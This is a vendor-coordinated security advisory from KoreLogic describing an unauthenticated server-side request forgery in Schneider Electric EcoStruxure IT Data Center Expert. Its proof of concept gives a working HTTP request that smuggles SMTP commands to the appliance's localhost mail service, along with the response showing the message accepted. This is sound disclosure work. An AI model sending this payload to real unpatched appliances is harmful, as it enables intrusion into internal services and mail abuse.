-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
KL-001-2025-011: Schneider Electric EcoStruxure IT Data Center Expert Unauthenticated Server-Side Request Forgery
Title: Schneider Electric EcoStruxure IT Data Center Expert Unauthenticated Server-Side Request Forgery
Advisory ID: KL-001-2025-011
Publication Date: 2025-07-09
Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2025-011.txt
1. Vulnerability Details
Affected Vendor: Schneider Electric
Affected Product: EcoStruxure IT Data Center Expert
Affected Version: 8.3 and prior
Platform: CentOS
CWE Classification: CWE-918: Server-Side Request Forgery (SSRF)
CVE ID: CVE-2025-50125
2. Vulnerability Description
The Data Center Expert ("DCE") appliance insecurely forwards
HTTP requests based on user-controlled values, enabling an
unauthenticated user to coerce the web application into sending
data to arbitrary locations, such as the SMTP service listening
on localhost.
3. Technical Description
When an HTTP request is sent to either the "/plugins" or
"/capturelogs" endpoints, the request is forwarded based on
the "Host" request header. Since the "Host" request header is
not validated, a user may supply any host / port combination
and send data to arbitrary locations and view the response,
creating a server-side request forgery vulnerability.
GET /plugins HTTP/1.1
Host: example.com
HTTP/1.1 404 Not Found
...
Example Domain
...
The upstream path is not controllable and HTTP redirects are
not followed.
Rather than issuing constrained HTTP requests, it is possible
to instead send malicious data to other services that leverage
protocols similar to HTTP, such as the SMTP service listening on
the appliance's loopback address. Attempts to send well-formed
HTTP requests to the SMTP service result in the TCP connection
being prematurely severed, as common HTTP verbs are a sign
of malicious activity. However, the proxy mechanism employed
by the DCE appliance does not validate the verb, allowing
malformed requests that contain valid SMTP commands such as
"EHLO" and "MAIL FROM".
When unexpected data is received, such as the "Host" and
"X-Forwarded-For" request header, a benign error is returned
without severing the TCP connection, allowing for additional
(and well-formed) SMTP commands to follow.
4. Mitigation and Remediation Recommendation
Version 9.0 of EcoStruxure IT Data Center Expert includes
fixes for these vulnerabilities and is available upon request
from Schneider Electric's Customer Care Center. Refer to
https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2025-189-01&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2025-189-01.pdf.
5. Credit
This vulnerability was discovered by Jaggar Henry and Jim
Becher of KoreLogic, Inc.
6. Disclosure Timeline
2024-11-21 : KoreLogic reports vulnerability details to
Schneider Electric CPCERT.
2024-11-22 : Vendor acknowledges receipt of KoreLogic's
submission.
2024-12-06 : Vendor confirms the reported vulnerability.
2024-12-12 : Vendor requests a meeting with KoreLogic to discuss
the timeline of remediation efforts for this
vulnerability, as well as for associated submissions
from KoreLogic.
2024-12-18 : KoreLogic and Schneider Electric agree to embargo
vulnerability details until product update 9.0,
circa July, 2025.
2025-01-29 : Vendor provides status update.
2025-03-17 : Vendor provides beta release containing remediation
for this and other associated vulnerabilities
reported by KoreLogic.
2025-06-20 : Vendor notifies KoreLogic that the publication date
for this vulnerability will be 2025-07-08.
2025-07-08 : Vendor public disclosure.
2025-07-09 : KoreLogic public disclosure.
7. Proof of Concept
This behavior allows unauthenticated attackers to interact with
services not usually exposed to the internet, such as the
appliance's SMTP service, to further exploit and enumerate the
system.
The following is an HTTP request sent to the DCE web interface
listening on TCP/80:
EHLO /plugins?%0a%0dfoobar HTTP/1.1
Host: 127.0.0.1:25
Content-Length: 137
HELO localhost
MAIL FROM:
RCPT TO:
DATA
Subject: foobar
This is a test email body
.
QUIT
As shown in the HTTP response, request headers that do not
represent valid SMTP commands are disregarded, allowing the
body to be parsed as a valid message:
HTTP/1.1 200 OK
...
220 dce.example.com ESMTP Sendmail 8.14.4/8.14.4; Mon, 1 Jul 2024 07:00:08 -0400501 5.0.0 Invalid domain name
500 5.5.1 Command unrecognized: "Host: 127.0.0.1:25"
500 5.5.1 Command unrecognized: "X-Forwarded-For: 192.168.2.65"
500 5.5.1 Command unrecognized: "X-Forwarded-Host: 127.0.0.1:25"
500 5.5.1 Command unrecognized: "X-Forwarded-Server: dce.example.com"
500 5.5.1 Command unrecognized: "Connection: Keep-Alive"
500 5.5.1 Command unrecognized: "Content-Length: 141"
500 5.5.1 Command unrecognized: ""
250 dce.example.com Hello localhost.localdomain [127.0.0.1], pleased to meet you
250 2.1.0 ... Sender ok
250 2.1.5 ... Recipient ok
354 Enter mail, end with "." on a line by itself
250 2.0.0 461B08WP030169 Message accepted for delivery
221 2.0.0 dce.example.com closing connection
The contents of this advisory are copyright(c) 2025
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/
KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html
Our public vulnerability disclosure policy is available at:
https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy
-----BEGIN PGP SIGNATURE-----
iQJOBAEBCAA4FiEEB12WYZwbVwYTJ/b2DKLsCTlWkekFAmhur7IaHGRpc2Nsb3N1
cmVzQGtvcmVsb2dpYy5jb20ACgkQDKLsCTlWkel/Kw//Wcem9CqR13hgmKsoLKVR
WIe88+wiOYrCOoPWGsyOY7mil7YkQXJuNYKBc7/mmJJfs6+D/JW2qrIQzqiuX13z
PCCF17YxQtTftgEh/mlqq1BOppC+0eixQrThr3KPgs5XO3S7p9RsiB9DxHeTJ3+1
/Nf6Tari4feMIzJ+H8kFgPxeTLvIm7zwIMLtjSMg62Jzx5ksukH4uvJnNaZVHNS9
8e+qWpJz3OeDKhMj7Byht8P3ryGpQaHY0P5inPaZIhdbTZaS1g5NIYGkl9QNvDxw
ZPtNwakknGUZlPib0HmWGtM2uNqgv6GUhLocfU1MmWYErPndkz1Ps4R2LuD8a9uU
baYPouKDIU2CkbKDGA/F1JimsadBp78md5CjbMirQX2u7YV+6uDzDTo4gPons9FF
X7UDNGVFd7WjFhC4IHzayC1OAm1fHXt8fLe5iqngqIJS/nPFImlxUxer0gbXEK4h
VU6IvJMVNYoQmLFbJN8GVxSgvlS1ksqhi7RCGkPhI953r0mkjd4CMBRiLdxal8N8
uc06tn9hBhuXI9+o3caDT3qjJ968ioJnSyFDbUX41oSOhsOveaREYsC5NivnWJFD
1sc/6wwBTu9G4snbfdIinVCnWtSjwfWfwFdzZtDqVqNc9OMkJ+mGTmnrufvGjvZP
KmhK0zNRxnES1Jz6pyPQh0M=
=VEKE
-----END PGP SIGNATURE-----